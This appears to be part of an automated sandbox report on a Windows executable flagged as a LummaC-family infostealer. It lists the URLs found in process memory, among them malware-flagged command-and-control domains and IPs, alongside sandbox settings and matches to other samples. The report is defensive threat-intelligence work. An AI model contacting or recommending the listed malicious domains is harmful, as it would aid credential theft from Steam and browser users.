                                                                                                                https://store.steampowered.com/points/shop/5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=5Z19n7XRT1.exe, 00000000.00000003.2246176841.0000000003064000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246052766.000000000307B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://crl.rootca1.amazontrust.com/rootca1.crl05Z19n7XRT1.exe, 00000000.00000003.2292863333.0000000003063000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://scentniej.buzz/5Z19n7XRT1.exe, 00000000.00000003.2167365798.0000000000906000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2167343314.0000000000934000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: malware
                                                                                                                      unknown
                                                                                                                      http://ocsp.rootca1.amazontrust.com0:5Z19n7XRT1.exe, 00000000.00000003.2292863333.0000000003063000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://steamcommunity.com/profiles/76561199724331900JW5Z19n7XRT1.exe, 00000000.00000003.2221183170.0000000000906000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199960919.0000000000906000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000002.2390650962.0000000000906000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://sketchfab.com5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://www.ecosia.org/newtab/5Z19n7XRT1.exe, 00000000.00000003.2270340473.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246176841.0000000003064000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246499324.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246052766.000000000307B000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2270388935.0000000003065000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://lv.queniujq.cn5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://steamcommunity.com/profiles/76561199724331900/inventory/5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2245459003.000000000303D000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br5Z19n7XRT1.exe, 00000000.00000003.2293981905.0000000003501000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://www.youtube.com/5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://store.steampowered.com/privacy_agreement/5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://www.google.com/recaptcha/5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://checkout.steampowered.com/5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://rebuildeso.buzz/5Z19n7XRT1.exe, 00000000.00000003.2167365798.0000000000906000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                  unknown
                                                                                                                                                  https://store.steampowered.com/;5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://store.steampowered.com/about/5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://steamcommunity.com/my/wishlist/5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://lev-tolstoi.com/api1Wu5Z19n7XRT1.exe, 00000000.00000003.2221183170.000000000094D000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221455502.000000000095A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                        unknown
                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://help.steampowered.com/en/5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://steamcommunity.com/market/5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://store.steampowered.com/news/5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://screwamusresz.buzz/api35Z19n7XRT1.exe, 00000000.00000003.2221183170.0000000000906000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199960919.0000000000906000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                unknown
                                                                                                                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=5Z19n7XRT1.exe, 00000000.00000003.2270340473.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246176841.0000000003064000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246499324.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246052766.000000000307B000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2270388935.0000000003065000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
URL | Source | Malicious | Antivirus Detection | Reputation
https://scentniej.buzz/IP | 5Z19n7XRT1.exe, 00000000.00000003.2167365798.0000000000906000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://store.steampowered.com/subscriber_agreement/ | 5Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org | 5Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2245459003.000000000303D000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://recaptcha.net/recaptcha/; | 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://scentniej.buzz/api | 5Z19n7XRT1.exe, 00000000.00000003.2167365798.000000000091F000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2167365798.0000000000906000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2167452734.0000000000921000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://steamcommunity.com/discussions/ | 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://store.steampowered.com/stats/ | 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am | 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://medal.tv | 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://broadcast.st.dl.eccdnx.com | 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png | 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a | 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://store.steampowered.com/steam_refunds/ | 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://x1.c.lencr.org/0 | 5Z19n7XRT1.exe, 00000000.00000003.2292863333.0000000003063000.00000004.00000800.00020000.00000000.sdmp | false |  | high
http://x1.i.lencr.org/0 | 5Z19n7XRT1.exe, 00000000.00000003.2292863333.0000000003063000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 5Z19n7XRT1.exe, 00000000.00000003.2270340473.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246176841.0000000003064000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246499324.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246052766.000000000307B000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2270388935.0000000003065000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a | 5Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900 | 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016 | 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e | 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://steamcommunity.com/workshop/ | 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://login.steampowered.com/ | 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb | 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp | false |  | high
https://support.mozilla.org/products/firefoxgro.all | 5Z19n7XRT1.exe, 00000000.00000003.2293981905.0000000003501000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c | 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://store.steampowered.com/legal/ | 5Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://www.mozilla.or | 5Z19n7XRT1.exe, 00000000.00000003.2293872198.0000000003060000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en | 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng | 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://lev-tolstoi.com/.co.jp | 5Z19n7XRT1.exe, 00000000.00000003.2221183170.000000000094D000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221455502.000000000095A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 5Z19n7XRT1.exe, 00000000.00000003.2270340473.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246176841.0000000003064000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246499324.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246052766.000000000307B000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2270388935.0000000003065000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a | 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl | 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmp | false |  | high
https://recaptcha.net | 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp | false |  | high
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.66.86 | lev-tolstoi.com | United States | 13335 | CLOUDFLARENETUS | false
172.67.157.254 | unknown | United States | 13335 | CLOUDFLARENETUS | true
23.55.153.106 | steamcommunity.com | United States | 20940 | AKAMAI-ASN1EU | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581620
Start date and time: 2024-12-28 09:57:59 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 26s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 5Z19n7XRT1.exe (renamed because the original name is a hash value)
Original Sample Name: fb4f1803fbfc70bc55b61bf418d52d3d.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@2/5@11/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 97%
                                                                                                                                                                                                                                • Number of executed functions: 23
                                                                                                                                                                                                                                • Number of non-executed functions: 228
                                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 104.208.16.94, 13.107.246.63, 52.149.20.212, 20.231.128.67
                                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                • VT rate limit hit for: 5Z19n7XRT1.exe
                                                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                                                03:58:53API Interceptor14x Sleep call for process: 5Z19n7XRT1.exe modified
                                                                                                                                                                                                                                03:59:16API Interceptor1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.66.86 | MV ROCKET_PDA.exe | malicious | FormBook | www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
172.67.157.254 | TdloJt4gY3.exe | malicious | LummaC |
172.67.157.254 | 726odELDs8.exe | malicious | LummaC |
172.67.157.254 | Tqa1vDp9NT.exe | malicious | LummaC |
172.67.157.254 | YrWaRb0IKJ.exe | malicious | LummaC |
172.67.157.254 | FfcoO2Giru.exe | malicious | LummaC |
172.67.157.254 | k7T6akLcAr.exe | malicious | LummaC |
172.67.157.254 | hx0wBsOjkQ.exe | malicious | LummaC |
172.67.157.254 | fnnGMmd8eJ.exe | malicious | LummaC |
172.67.157.254 | IzDjbVdHha.exe | malicious | LummaC |
172.67.157.254 | T4qO1i2Jav.exe | malicious | LummaC Stealer |
23.55.153.106 | TdloJt4gY3.exe | malicious | LummaC |
23.55.153.106 | 3LUyRfIoKs.exe | malicious | LummaC |
23.55.153.106 | 726odELDs8.exe | malicious | LummaC |
23.55.153.106 | Tqa1vDp9NT.exe | malicious | LummaC |
23.55.153.106 | YrWaRb0IKJ.exe | malicious | LummaC |
23.55.153.106 | 2S6U7zz1Jg.exe | malicious | LummaC |
23.55.153.106 | v5Evrl41VR.exe | malicious | LummaC |
23.55.153.106 | H1iOI9vWfh.exe | malicious | LummaC |
23.55.153.106 | 8WFJ38EJo5.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar |
23.55.153.106 | FfcoO2Giru.exe | malicious | LummaC |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
lev-tolstoi.com | TdloJt4gY3.exe | malicious | LummaC | 172.67.157.254
lev-tolstoi.com | 3LUyRfIoKs.exe | malicious | LummaC | 104.21.66.86
lev-tolstoi.com | 726odELDs8.exe | malicious | LummaC | 172.67.157.254
lev-tolstoi.com | Tqa1vDp9NT.exe | malicious | LummaC | 172.67.157.254
lev-tolstoi.com | YrWaRb0IKJ.exe | malicious | LummaC | 172.67.157.254
lev-tolstoi.com | v5Evrl41VR.exe | malicious | LummaC | 104.21.66.86
lev-tolstoi.com | H1iOI9vWfh.exe | malicious | LummaC | 104.21.66.86
lev-tolstoi.com | 8WFJ38EJo5.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 104.21.66.86
lev-tolstoi.com | FfcoO2Giru.exe | malicious | LummaC | 172.67.157.254
lev-tolstoi.com | k7T6akLcAr.exe | malicious | LummaC | 172.67.157.254
steamcommunity.com | TdloJt4gY3.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | 3LUyRfIoKs.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | 726odELDs8.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | Tqa1vDp9NT.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | YrWaRb0IKJ.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | 2S6U7zz1Jg.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | v5Evrl41VR.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | H1iOI9vWfh.exe | malicious | LummaC | 23.55.153.106
